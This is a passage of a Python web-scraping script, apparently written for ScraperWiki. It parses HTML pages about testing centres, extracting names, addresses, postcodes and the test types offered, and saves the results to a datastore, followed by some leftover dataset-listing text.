else:
additional_details = ""
testsNode = addressNode.findNextSibling("p").findNextSibling("p")
if addressNode.findNextSibling("strong"):
additional_details = None
startNode = addressNode
test_types = []
while True:
testNode = startNode.findNextSibling("strong")
if testNode is None:
break
test = testNode.text.strip(" :")
details = testNode.nextSibling.replace(" "," ").replace(": ","").strip()
test_types.append([test,details])
startNode = testNode.nextSibling
else:
tests = soup_strip_html_preserve_brs(testsNode)
test_types = [line.split(":") for line in tests.split("\n") if is_test_type(line)]
data = {
"url": url,
"title": p_title,
"center_name": center_name,
"address": address,
"postcode": postcode,
"additional_details": additional_details,
"on_offer": ",".join([t[0] for t in test_types])
}
for t in test_types:
data[t[0].lower()+"_avail"] = t[1]
scraperwiki.datastore.save(unique_keys=['url'], data= data)
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.